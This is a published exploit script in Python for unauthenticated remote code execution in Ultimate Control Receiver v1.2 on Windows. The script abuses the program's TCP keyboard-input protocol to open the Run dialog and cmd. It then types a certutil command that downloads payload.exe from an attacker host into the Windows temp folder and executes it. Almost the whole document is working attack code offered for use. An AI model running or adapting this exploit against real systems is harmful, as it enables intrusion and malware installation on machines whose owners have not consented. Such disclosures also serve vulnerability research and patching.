# Exploit Title: Ultimate Control Receiver (v1.2) - Remote Code Execution # Date: 2/08/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.negusoft.com/ # Software Link: https://www.negusoft.com/ucontrol/downloads/pc.html # Version: 1.2 # Tested on: Windows 10 ''' Description: Ultimate Control Receiver v1.2 is vulnerable to unauthenticated remote code execution. An attacker can exploit the keyboard input functionality over TCP to execute arbitrary system commands on the target machine without user interaction. ''' import socket import time import struct TARGET_IP = "192.168.1.203" TARGET_PORT = 13894 LHOST = "192.168.1.63" VK_RETURN = 0x0D VK_LWIN = 0x5B VK_R = 0x52 def create_type_char_message(character): msg = bytearray(32) msg[0] = 18 msg[1] = 18 char_code = ord(character) struct.pack_into(">I", msg, 4, char_code) struct.pack_into(">Q", msg, 24, int(time.time() * 1000)) return msg def create_key_input_message(vk_code, input_type=0, command=False): msg = bytearray(32) msg[0] = 17 msg[1] = 17 flags = 1 << 4 if command else 0 msg[2] = flags if input_type == 0: msg[3] = 0 elif input_type == 1: msg[3] = 3 elif input_type == 2: msg[3] = 1 struct.pack_into(">I", msg, 4, vk_code) struct.pack_into(">Q", msg, 24, int(time.time() * 1000)) return msg def send_character(sock, character): sock.send(create_type_char_message(character)) time.sleep(0.05) def send_string(sock, text): for char in text: send_character(sock, char) def send_win_r(): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(5) try: s.connect((TARGET_IP, TARGET_PORT)) s.sendall(bytes([3, 3] + [0]*30)) s.recv(32) s.send(create_key_input_message(VK_LWIN, 2, True)) s.send(create_key_input_message(VK_R, 2, True)) s.send(create_key_input_message(VK_R, 1, True)) s.send(create_key_input_message(VK_LWIN, 1, True)) time.sleep(0.5) return True except Exception: return False def send_cmd_command(): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(10) try: s.connect((TARGET_IP, TARGET_PORT)) s.sendall(bytes([3, 3] + [0]*30)) s.recv(32) command = f"certutil -urlcache -f http://{LHOST}/payload.exe \\windows\\temp\\payload.exe && \\windows\\temp\\payload.exe" send_string(s, command) s.send(create_key_input_message(VK_RETURN)) return True except Exception: return False def main(): if not send_win_r(): return time.sleep(3) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(10) try: s.connect((TARGET_IP, TARGET_PORT)) s.sendall(bytes([3, 3] + [0]*30)) s.recv(32) send_string(s, "cmd") s.send(create_key_input_message(VK_RETURN)) time.sleep(2) except Exception: return time.sleep(3) if not send_cmd_command(): return if __name__ == "__main__": main()